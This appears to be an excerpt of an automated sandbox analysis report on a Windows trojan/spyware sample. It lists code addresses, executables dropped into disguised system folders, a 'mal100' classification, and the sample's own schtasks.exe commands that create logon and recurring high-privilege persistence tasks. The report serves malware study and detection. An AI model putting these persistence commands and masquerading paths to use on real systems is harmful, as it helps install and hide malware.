                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B791AC519_2_00007FFD9B791AC5
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B79FE6919_2_00007FFD9B79FE69
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AC84E19_2_00007FFD9B7AC84E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AC78219_2_00007FFD9B7AC782
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AC73519_2_00007FFD9B7AC735
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AC5A819_2_00007FFD9B7AC5A8
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AC90C19_2_00007FFD9B7AC90C
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AC91919_2_00007FFD9B7AC919
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AC92619_2_00007FFD9B7AC926
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AC88B19_2_00007FFD9B7AC88B
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AC87E19_2_00007FFD9B7AC87E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AB0DD19_2_00007FFD9B7AB0DD
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B7B594F20_2_00007FFD9B7B594F
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B771AC520_2_00007FFD9B771AC5
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78C84E20_2_00007FFD9B78C84E
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78C78220_2_00007FFD9B78C782
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78C73520_2_00007FFD9B78C735
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78C5AF20_2_00007FFD9B78C5AF
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78C90C20_2_00007FFD9B78C90C
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78C91920_2_00007FFD9B78C919
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78C92620_2_00007FFD9B78C926
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78C88B20_2_00007FFD9B78C88B
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78C87E20_2_00007FFD9B78C87E
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B77FE6920_2_00007FFD9B77FE69
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B78B0DD20_2_00007FFD9B78B0DD
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 22_2_00007FFD9B771AC522_2_00007FFD9B771AC5
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 22_2_00007FFD9B77130022_2_00007FFD9B771300
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeCode function: 24_2_00007FFD9B751AC524_2_00007FFD9B751AC5
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeCode function: 24_2_00007FFD9B75130024_2_00007FFD9B751300
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 25_2_00007FFD9B791AC525_2_00007FFD9B791AC5
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 25_2_00007FFD9B79130025_2_00007FFD9B791300
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B77FE6928_2_00007FFD9B77FE69
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78C84E28_2_00007FFD9B78C84E
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78C78228_2_00007FFD9B78C782
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78C73528_2_00007FFD9B78C735
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78C5AF28_2_00007FFD9B78C5AF
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78C90C28_2_00007FFD9B78C90C
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78C91928_2_00007FFD9B78C919
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78C92628_2_00007FFD9B78C926
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78C88B28_2_00007FFD9B78C88B
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78C87E28_2_00007FFD9B78C87E
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B7B594F28_2_00007FFD9B7B594F
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B771AC528_2_00007FFD9B771AC5
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B78B0DD28_2_00007FFD9B78B0DD
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B7B594F31_2_00007FFD9B7B594F
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B77FE6931_2_00007FFD9B77FE69
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B771AC531_2_00007FFD9B771AC5
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78C84E31_2_00007FFD9B78C84E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78C78231_2_00007FFD9B78C782
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78C73531_2_00007FFD9B78C735
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78C5AF31_2_00007FFD9B78C5AF
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78C90C31_2_00007FFD9B78C90C
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78C91931_2_00007FFD9B78C919
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78C92631_2_00007FFD9B78C926
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78C88B31_2_00007FFD9B78C88B
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78C87E31_2_00007FFD9B78C87E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B78B0DD31_2_00007FFD9B78B0DD
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AC84E32_2_00007FFD9B7AC84E
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AC78232_2_00007FFD9B7AC782
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AC73532_2_00007FFD9B7AC735
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AC5A832_2_00007FFD9B7AC5A8
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AC90C32_2_00007FFD9B7AC90C
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AC91932_2_00007FFD9B7AC919
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AC92632_2_00007FFD9B7AC926
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AC88B32_2_00007FFD9B7AC88B
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AC87E32_2_00007FFD9B7AC87E
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7D594F32_2_00007FFD9B7D594F
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B791AC532_2_00007FFD9B791AC5
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B79FE6932_2_00007FFD9B79FE69
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AB0DD32_2_00007FFD9B7AB0DD
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 33_2_00007FFD9B781AC533_2_00007FFD9B781AC5
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 33_2_00007FFD9B78130033_2_00007FFD9B781300
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78C84E34_2_00007FFD9B78C84E
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78C78234_2_00007FFD9B78C782
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78C73534_2_00007FFD9B78C735
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78C5AF34_2_00007FFD9B78C5AF
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78C90C34_2_00007FFD9B78C90C
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78C91934_2_00007FFD9B78C919
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78C92634_2_00007FFD9B78C926
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78C88B34_2_00007FFD9B78C88B
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78C87E34_2_00007FFD9B78C87E
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B771AC534_2_00007FFD9B771AC5
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B77FE6934_2_00007FFD9B77FE69
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B7B594F34_2_00007FFD9B7B594F
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 34_2_00007FFD9B78B0DD34_2_00007FFD9B78B0DD
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B79FE6935_2_00007FFD9B79FE69
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B791AC535_2_00007FFD9B791AC5
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7D594F35_2_00007FFD9B7D594F
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC84E35_2_00007FFD9B7AC84E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC78235_2_00007FFD9B7AC782
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC73535_2_00007FFD9B7AC735
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC5A835_2_00007FFD9B7AC5A8
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC90C35_2_00007FFD9B7AC90C
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC91935_2_00007FFD9B7AC919
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC92635_2_00007FFD9B7AC926
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC88B35_2_00007FFD9B7AC88B
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC87E35_2_00007FFD9B7AC87E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AB0DD35_2_00007FFD9B7AB0DD
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B77FE6936_2_00007FFD9B77FE69
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C84E36_2_00007FFD9B78C84E
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C78236_2_00007FFD9B78C782
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C73536_2_00007FFD9B78C735
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C5AF36_2_00007FFD9B78C5AF
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C90C36_2_00007FFD9B78C90C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C91936_2_00007FFD9B78C919
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C92636_2_00007FFD9B78C926
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C88B36_2_00007FFD9B78C88B
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C87E36_2_00007FFD9B78C87E
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B7B594F36_2_00007FFD9B7B594F
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B771AC536_2_00007FFD9B771AC5
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78B0DD36_2_00007FFD9B78B0DD
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B77FE6937_2_00007FFD9B77FE69
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B7B594F37_2_00007FFD9B7B594F
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C84E37_2_00007FFD9B78C84E
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C78237_2_00007FFD9B78C782
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C73537_2_00007FFD9B78C735
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C5AF37_2_00007FFD9B78C5AF
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C90C37_2_00007FFD9B78C90C
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C91937_2_00007FFD9B78C919
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C92637_2_00007FFD9B78C926
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C88B37_2_00007FFD9B78C88B
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C87E37_2_00007FFD9B78C87E
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B771AC537_2_00007FFD9B771AC5
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78B0DD37_2_00007FFD9B78B0DD
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ADqcsYvZ.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                    Source: RbOZahUq.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: HtvJqEPI.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: yKbtGcJa.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: fxzonGoL.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: WPgYDdje.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: MgNITBew.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: uUlCzfJh.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: klRmPCEz.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1750255997.000000001BE45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Z4D3XAZ2jB.exe
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1750078986.000000001BE17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Z4D3XAZ2jB.exe
                    Source: Z4D3XAZ2jB.exe, 00000000.00000000.1662784857.00000000004A4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Z4D3XAZ2jB.exe
                    Source: Z4D3XAZ2jB.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Z4D3XAZ2jB.exe
                    Source: Z4D3XAZ2jB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Z4D3XAZ2jB.exeStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: services.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: ZDtOzYsYYWKWEhNYzFc.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: ZDtOzYsYYWKWEhNYzFc.exe0.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: ZDtOzYsYYWKWEhNYzFc.exe1.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: ZDtOzYsYYWKWEhNYzFc.exe2.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: RbOZahUq.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: HtvJqEPI.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: yKbtGcJa.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: fxzonGoL.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: WPgYDdje.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: uUlCzfJh.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: klRmPCEz.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/74@1/1
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exeJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\wySLBGmi.logJump to behavior
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3616:120:WilError_03
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMutant created: \Sessions\1\BaseNamedObjects\Local\a35fc7c35ac07669507f238ec6844456a8c9fb2c4761bbe6ae2ce46e1ccb54df
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\AppData\Local\Temp\ii0xQfCo43Jump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat"
                    Source: Z4D3XAZ2jB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Z4D3XAZ2jB.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Z4D3XAZ2jB.exeVirustotal: Detection: 59%
                    Source: Z4D3XAZ2jB.exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile read: C:\Users\user\Desktop\Z4D3XAZ2jB.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Z4D3XAZ2jB.exe "C:\Users\user\Desktop\Z4D3XAZ2jB.exe"
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
